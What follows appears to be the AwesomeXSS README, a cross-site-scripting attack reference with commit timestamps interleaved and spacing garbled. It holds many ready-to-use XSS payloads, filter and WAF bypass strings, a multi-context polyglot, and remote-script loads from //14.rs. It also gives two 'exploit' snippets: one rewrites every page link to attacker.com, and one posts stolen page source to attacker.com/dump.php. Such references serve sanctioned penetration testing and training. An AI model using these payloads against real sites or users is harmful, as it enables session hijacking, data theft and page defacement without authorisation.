2018-03-11 20:05:30 +05:30
# AwesomeXSS
2018-03-11 21:21:25 +05:30
Awesome XSS stuff .
Put this repo on watch . I will be updating it regularly .
2018-03-11 21:34:00 +05:30
2018-03-22 13:38:43 +05:30
# # # Awesome Challenges
- [ Google ' s XSS Challenge ] ( https : //xss-game.appspot.com/)
- [ prompt ( 1 ) to win ] ( http : //prompt.ml/)
2018-03-11 21:21:25 +05:30
# # # Awesome People
2018-03-12 13:36:37 +05:30
- [ Somdev Sangwan ] ( https : //twitter.com/s0md3v) because I made this repo :3
2018-03-11 21:21:25 +05:30
2018-03-22 13:38:43 +05:30
# # # Awesome Reads & Presentations
- [ XSS in Sarahah ] ( http : //www.shawarkhan.com/2017/08/sarahah-xss-exploitation-tool.html)
2018-03-22 18:55:39 +05:30
- [ Bypass Any WAF for XSS ] ( https : //teamultimate.in/bypass-waf-xss-easily/)
2018-03-22 13:38:43 +05:30
- [ XSS in Facebook via PNG Content Type ] ( https : //whitton.io/articles/xss-on-facebook-via-png-content-types/)
2018-03-22 18:52:33 +05:30
- [ How I met your girlfriend ] ( https : //www.youtube.com/watch?v=fWk_rMQiDGc)
- [ How to Find 1 , 352 Wordpress XSS Plugin Vulnerabilities in one hour ] ( https : //www.youtube.com/watch?v=9ADubsByGos)
2018-03-11 21:21:25 +05:30
- [ Blind XSS ] ( https : //www.youtube.com/watch?v=OT0fJEtz7aE)
- [ Copy Pest ] ( https : //www.slideshare.net/x00mario/copypest)
2018-03-12 13:36:37 +05:30
# # # Awesome Tools
2018-05-09 12:31:14 +05:30
- [ XSStrike ] ( https : //github.com/UltimateHackers/XSStrike)
2018-11-25 00:02:04 +05:30
- [ xsshunter . com ] ( https : //xsshunter.com)
2018-03-21 15:14:55 +05:30
- [ BeEF ] ( https : //github.com/beefproject/beef)
- [ JShell ] ( https : //github.com/UltimateHackers/JShell)
2018-03-12 13:36:37 +05:30
2018-11-08 19:43:25 +05:30
# # # Awesome XSS Mind Maps
A beutiful XSS mind map by Jack Masa , [ here ] ( https : //github.com/s0md3v/AwesomeXSS/blob/master/Database/jackmasa-mind-map.png)
2018-11-24 23:55:44 +05:30
# # # Awesome DOM XSS
- Does your input go into a sink ? ` Vulnerable `
- It doesn ' t ? ` Not vulnerable `
* * Source * * : An input that could be controlled by an external ( untrusted ) source .
` ` `
document . URL
document . documentURI
document . URLUnencoded ( IE 5.5 or later Only )
document . baseURI
location
location . href
location . search
location . hash
location . pathname
document . cookie
document . referrer
window . name
history . pushState ( )
history . replaceState ( )
localStorage
sessionStorage
` ` `
* * Sink * * : A potentially dangerous method that could lead to a vulnerability . In this case a DOM Based XSS .
` ` `
eval
Function
setTimeout
setInterval
setImmediate
execScript
crypto . generateCRMFRequest
ScriptElement . src
ScriptElement . text
ScriptElement . textContent
ScriptElement . innerText
anyTag . onEventName
document . write
document . writeln
anyElement . innerHTML
Range . createContextualFragment
window . location
document . location
` ` `
This comprehensive list of sinks and source is taken from [ domxsswiki ] ( https : //github.com/wisec/domxsswiki).
2018-03-22 18:34:27 +05:30
# # # Awesome Payloads
` ` `
2018-11-05 15:20:55 +05:30
< d3 "<" / onclick = "1>[confirm``]" < " > z
2018-11-06 23:24:38 +05:30
< d3 / onmouseenter = [ 2 ] . find ( confirm ) > z
2018-06-05 21:47:49 +05:30
< details open ontoggle = confirm ( ) >
2018-07-28 23:26:15 +05:30
< script y = "><" > /*<script* */ prompt ( ) < / s c r i p t
< w = "/x=" y > " / ondblclick = ` < ` [ confir\u006d ` ` ] > z
2018-06-05 21:47:49 +05:30
< a href = "javascript%26colon;alert(1)" > click
2018-09-12 22:16:02 +05:30
< a href = javas & # 99 ; ript : alert ( 1 ) > click
2018-04-04 15:12:25 +05:30
< script / "<a" / src = data : = " . < a , [ 8 ] . some ( confirm ) >
2018-06-05 21:47:49 +05:30
< svg / x = ">" / onload = confirm ( ) //
2018-04-04 15:12:25 +05:30
< -- ` <img/src= ` onerror = confirm ` ` > -- ! >
2018-03-22 18:34:27 +05:30
< svg % 0 Aonload = % 09 ( ( pro\u006dpt ) ) ( ) //
< sCript x > ( ( ( confirm ) ) ) ` ` < / s c R i p t x >
< svg < / o n l o a d = " 1 > ( _ = p r o m p t , _ ( 1 ) ) " " >
2018-07-28 23:26:15 +05:30
<!-- > < script src = //14.rs>
2018-03-22 18:34:27 +05:30
< embed src = //14.rs>
< script x = ">" src = //15.rs></script>
< ! '/*"/*/' /*/"/*--></Script><Image SrcSet=K */ ; OnError = confirm ` 1 ` //>
< iframe / src \ / \ / onload = prompt ( 1 )
< x oncut = alert ( ) > x
< svg onload = write ( ) >
` ` `
2018-11-24 23:55:44 +05:30
2018-10-31 23:29:26 +05:30
# # # Awesome Polyglots
Here ' s an XSS polyglot that I made which can break out of 20 + contexts :
2018-03-22 18:45:06 +05:30
` ` `
2018-10-31 23:29:26 +05:30
% 0 ajavascript : ` /* \" /*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'"> `
2018-03-22 18:45:06 +05:30
` ` `
2018-11-08 19:43:25 +05:30
Explanation of how it works , [ here ] ( https : //github.com/s0md3v/AwesomeXSS/blob/master/Database/polyglot.png)
2018-03-22 18:45:06 +05:30
# # # Awesome Tags & Event Handlers
- [ 105 Event Handlers with description ] ( https : //github.com/UltimateHackers/AwesomeXSS/blob/master/Database/event-handlers.md)
- [ 200 Event Handlers without description ] ( http : //pastebin.com/raw/WwcBmz5J)
2018-03-22 18:34:27 +05:30
Some HTML Tags that you will be using
` ` `
img
svg
body
html
embed
script
object
details
isindex
iframe
audio
video
` ` `
2018-03-11 21:21:25 +05:30
# # # Awesome Context Breaking
2018-11-07 03:46:12 +05:30
# # # # HTML Context
Case : ` <tag>You searched for $ input. </tag> `
2018-03-11 21:21:25 +05:30
` ` `
< svg onload = alert ( ) >
< / t a g > < s v g o n l o a d = a l e r t ( ) >
` ` `
# # # # Attribute Context
2018-11-07 03:46:12 +05:30
Case : ` <tag attribute=" $ input"> `
2018-03-11 21:21:25 +05:30
` ` `
" > < svg onload = alert ( ) >
"><svg onload=alert()><b attr="
" onmouseover=alert() "
" onmouseover = alert ( ) //
2018-05-07 09:21:55 +05:30
"autocous/onfocus=" alert ( )
2018-03-11 21:21:25 +05:30
` ` `
# # # # JavaScript Context
2018-11-07 03:46:12 +05:30
Case : ` <script> var new something = ' $ input'; </script> `
2018-03-11 21:21:25 +05:30
` ` `
'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
< / s c r i p t > < s v g o n l o a d = a l e r t ( ) >
` ` `
2018-03-21 12:18:10 +05:30
# # # Awesome Confirm Variants
Yep , confirm because alert is too mainstream .
` ` `
confirm ( )
confirm ` `
( ( ( confirm ) ) ) ` `
2018-03-29 12:37:37 +05:30
co\u006efirm ( )
2018-03-21 12:18:10 +05:30
new class extends confirm ` ` { }
2018-04-04 15:12:25 +05:30
[ 8 ] . find ( confirm )
[ 8 ] . map ( confirm )
[ 8 ] . some ( confirm )
[ 8 ] . every ( confirm )
[ 8 ] . filter ( confirm )
[ 8 ] . findIndex ( confirm )
2018-03-21 12:18:10 +05:30
` ` `
2018-03-11 21:34:00 +05:30
# # # Awesome Exploits
2018-10-21 11:42:09 +05:30
# # # # # Replace all links
` ` ` javascript
Array . from ( document . getElementsByTagName ( "a" ) ) . forEach ( function ( i ) {
i . href = "https://attacker.com" ;
} ) ;
` ` `
2018-06-03 11:29:31 +05:30
# # # # # Source Code Stealer
` ` ` javascript
var request = new XMLHttpRequest ( ) ;
request . open ( "GET" , url , true ) ;
request . send ( ) ;
request . onreadystatechange = function ( ) {
if ( request . readyState == 4 )
response = request . responseText ;
var dump = new XMLHttpRequest ( ) ;
dump . open ( "POST" , "attacker.com/dump.php" , true )
dump . send ( response ) ;
}
` ` `
2018-03-21 12:18:10 +05:30
A good compilation of advanced XSS exploits can be found [ here ] ( http : //www.xss-payloads.com/payloads-list.html?a#category=all)
2018-03-11 21:21:25 +05:30
2018-03-12 13:36:37 +05:30
# # # Awesome Probing
If nothing of this works , take a look at * * Awesome Bypassing * * section
First of all , enter a non - malicious string like * * d3v * * and look at the source code to get an idea about number and contexts of refelections .
2018-11-07 03:46:12 +05:30
< br > Now for attribute context , check if double quotes ( ") are being filtered by entering `x" d3v ` . If it gets altered to ` x & quot ; d3v ` , chances are that output is getting properly escaped. If this happens, try doing the same for single quotes (') by entering ` x ' d3v ` , if it gets altered to ` x & apos ; ` , you are doomed. The only thing you can try is encoding.<br>
2018-03-12 13:36:37 +05:30
If the quotes are not being filtered , you can simply try payloads from * * Awesome Context Breaking * * section .
< br > For javascript context , check which quotes are being used for example if they are doing
` ` `
variable = 'value' or variable = "value"
` ` `
2018-11-07 03:46:12 +05:30
Now lets say single quotes ( ') are in use, in that case enter `x' d3v ` . If it gets altered to ` x \ \ 'd3v`, try escaping the backslash (\) by adding a backslash to your probe i.e. `x\\' d3v ` . If it works use the following payload:
2018-03-12 13:36:37 +05:30
` ` `
2018-09-14 02:06:47 +05:30
\ ' - alert ( ) //
2018-03-12 13:36:37 +05:30
` ` `
2018-11-07 03:46:12 +05:30
But if it gets altered to ` x \\ \\ 'd3v ` , the only thing you can try is closing the script tag itself by using
2018-03-12 13:36:37 +05:30
` ` `
< / s c r i p t > < s v g o n l o a d = a l e r t ( ) >
` ` `
2018-11-07 03:46:12 +05:30
For simple HTML context , the probe is ` x<d3v ` . If it gets altered to ` x>d3v ` , proper sanitization is in place . If it gets reflected as it as , you can enter a dummy tag to check for potenial filters . The dummy tag I like to use is ` x<xxx> ` . If it gets stripped or altered in any way , it means the filter is looking for a pair of ` < ` and ` > ` . It can simply bypassed using
2018-03-12 13:36:37 +05:30
` ` `
< svg onload = alert ( ) //
` ` `
or this ( it will not work in all cases )
` ` `
< svg onload = alert ( )
` ` `
If the your dummy tags lands in the source code as it is , go for any of these payloads
` ` `
< svg onload = alert ( ) >
< embed src = //14.rs>
< details open ontoggle = alert ( ) >
` ` `
# # # Awesome Bypassing
2018-03-21 15:14:55 +05:30
* * Note : * * None of these payloads use single ( ' ) or double quotes ( " ) .
- Without event handlers
` ` `
< object data = javascript : confirm ( ) >
2018-04-04 16:55:43 +05:30
< a href = javascript : confirm ( ) > click here
< script src = //14.rs></script>
2018-03-21 15:14:55 +05:30
< script > confirm ( ) < / s c r i p t >
` ` `
- Without space
` ` `
< svg / onload = confirm ( ) >
2018-04-04 16:55:43 +05:30
< iframe / src = javascript : alert ( 1 ) >
2018-03-21 15:14:55 +05:30
` ` `
- Without slash ( / )
` ` `
< svg onload = confirm ( ) >
< img src = x onerror = confirm ( ) >
` ` `
- Without equal sign ( = )
` ` `
< script > confirm ( ) < / s c r i p t >
` ` `
- Without closing angular bracket ( > )
` ` `
< svg onload = confirm ( ) //
` ` `
- Without alert , confirm , prompt
` ` `
2018-03-22 13:38:43 +05:30
< script src = //14.rs></script>
2018-03-21 15:14:55 +05:30
< svg onload = co\u006efirm ( ) >
< svg onload = z = co\u006efir\u006d , z ( ) >
` ` `
- Without a Valid HTML tag
` ` `
< x onclick = confirm ( ) > click here
2018-04-04 16:55:43 +05:30
< x ondrag = aconfirm ( ) > drag it
` ` `
2018-10-24 08:44:16 +05:30
- Bypass tag blackilisting
` ` `
< / S c R i p T >
< / s c r i p t
< /script/ >
< / s c r i p t x >
` ` `
2018-04-04 16:55:43 +05:30
* * Filter bypass procedure by [ Rodolfo Assis ] ( https : //twitter.com/rodoassis)**
` ` `
< x onxxx = 1
% 3 Cx onxxx = 1
< % 78 onxxx = 1
< x % 6 Fnxxx = 1
< x o % 6 Exxx = 1
< x on % 78 xx = 1
< x onxxx % 3 D1
< X onxxx = 1
< x ONxxx = 1
< x OnXxx = 1
< X OnXxx = 1
< x onxxx = 1 onxxx = 1
< x / onxxx = 1
< x % 09 onxxx = 1
< x % 0 Aonxxx = 1
< x % 0 Conxxx = 1
< x % 0 Donxxx = 1
< x % 2 Fonxxx = 1
< x 1 = '1' onxxx = 1
< x 1 = "1" onxxx = 1
< x < / o n x x x = 1
< x 1 = ">" onxxx = 1
< http : //onxxx%3D1/
< x % 2 F1 = " > % 22 OnXxx % 3 D1
2018-03-21 15:14:55 +05:30
` ` `
2018-03-11 21:21:25 +05:30
2018-03-22 18:52:33 +05:30
# # # Awesome Encoding
2018-11-08 19:43:25 +05:30
| HTML | Char | Numeric | Description | Hex | CSS ( ISO ) | JS ( Octal ) |
| -- -- | -- -- | -- -- -- - | -- -- -- -- -- - | -- -- | -- -- -- -- | -- -- -- -- -- |
| ` " ` | " | ` " ` | quotation mark | u + 0022 | \ 0022 | \ 42 |
| ` # ` | # | ` # ` | number sign | u + 0023 | \ 0023 | \ 43 |
| ` $ ` | $ | ` $ ` | dollar sign | u + 0024 | \ 0024 | \ 44 |
| ` % ` | % | ` % ` | percent sign | u + 0025 | \ 0025 | \ 45 |
| ` & ` | ` &| ` & # 38 ; ` |ampersand|u+0026| \0 026| \4 6|
| ` ' ` | ' | ` ' ` | apostrophe | u + 0027 | \ 0027 | \ 47 |
| ` ( ` | ( | ` ( ` | left parenthesis | u + 0028 | \ 0028 | \ 50 |
| ` ) ` | ) | ` ) ` | right parenthesis | u + 0029 | \ 0029 | \ 51 |
| ` * ` | * | ` * ` | asterisk | u + 002 A | \ 002 a | \ 52 |
| ` + ` | + | ` + ` | plus sign | u + 002 B | \ 002 b | \ 53 |
| ` , ` | , | ` , ` | comma | u + 002 C | \ 002 c | \ 54 |
| ` − ` | - | ` - ` | hyphen - minus | u + 002 D | \ 002 d | \ 55 |
| ` . ` | . | ` . ` | full stop ; period | u + 002 E | \ 002 e | \ 56 |
| ` / ` | / | ` & # 4 7 ; ` | s o l i d u s ; s l a s h | u + 0 0 2 F | \ 0 0 2 f | \ 5 7 |
| ` : ` | : | ` : ` | colon | u + 003 A | \ 003 a | \ 72 |
| ` ; ` | ; ` | ` & # 59 ; ` |semicolon|u+003B| \0 03b| \7 3|
| ` < ` | < | ` < ` | less - than | u + 003 C | \ 003 c | \ 74 |
| ` = ` |= | ` = ` | equals | u + 003 D | \ 003 d | \ 75 |
| ` > ` | > | ` > ` | greater - than sign | u + 003 E | \ 003 e | \ 76 |
| ` ? ` | ? | ` ? ` | question mark | u + 003 F | \ 003 f | \ 77 |
| ` @ ` | @ | ` @ ` | at sign ; commercial at | u + 0040 | \ 0040 | \ 100 |
| ` [ ` | \ [ | ` [ ` | left square bracket | u + 005 B | \ 005 b | \ 133 |
2019-01-08 18:01:34 +05:30
| ` \ ` | / | ` & # 9 2 ; ` | b a c k s l a s h | u + 0 0 5 C | \ 0 0 5 c | \ 1 3 4 |
2018-11-08 19:43:25 +05:30
| ` ] ` | ] | ` ] ` | right square bracket | u + 005 D | \ 005 d | \ 135 |
| ` ^ ` | ^ | ` ^ ` | circumflex accent | u + 005 E | \ 005 e | \ 136
| ` _ ` | _ | ` _ ` | low line | u + 005 F | \ 005 f | \ 137 |
| ` ` ` | \ ` | ` & # 96 ; ` |grave accent|u+0060| \0 060| \u 0060|
| ` { ` | { | ` { ` | left curly bracket | u + 007 b | \ 007 b | \ 173 |
| ` | ` | \ || ` | ` | vertical bar | u + 007 c | \ 007 c | \ 174 |
| ` } ` | } | ` } ` | right curly bracket | u + 007 d | \ 007 d | \ 175 |
2018-03-22 18:52:33 +05:30
2018-03-11 21:21:25 +05:30
# # # Awesome Tips & Tricks
2018-11-07 03:46:12 +05:30
- ` http(s):// ` can be shortened to ` // ` or ` / \\ ` or ` \\ ` .
- ` document.cookie ` can be shortened to ` cookie ` . It applies to other DOM objects as well .
- alert and other pop - up functions don 't need a value, so stop doing `alert(' XSS ' ) ` and start doing ` alert ( ) `
- You can use ` // ` to close a tag instead of ` > ` .
- I have found that ` confirm ` is the least detected pop - up function so stop using ` alert ` .
- Quotes around attribute value aren 't neccessary as long as it doesn' t contain spaces . You can use ` <script src=//14.rs> ` instead of ` <script src="//14.rs"> `
2019-01-08 18:01:34 +05:30
- The shortest HTML context XSS payload is ` <script src=//14.rs> ` ( 19 chars )
2018-03-11 21:34:00 +05:30
2018-03-12 16:55:26 +05:30
# # # Awesome Credits
2018-03-11 21:34:00 +05:30
All the payloads are crafted by me unless specified .
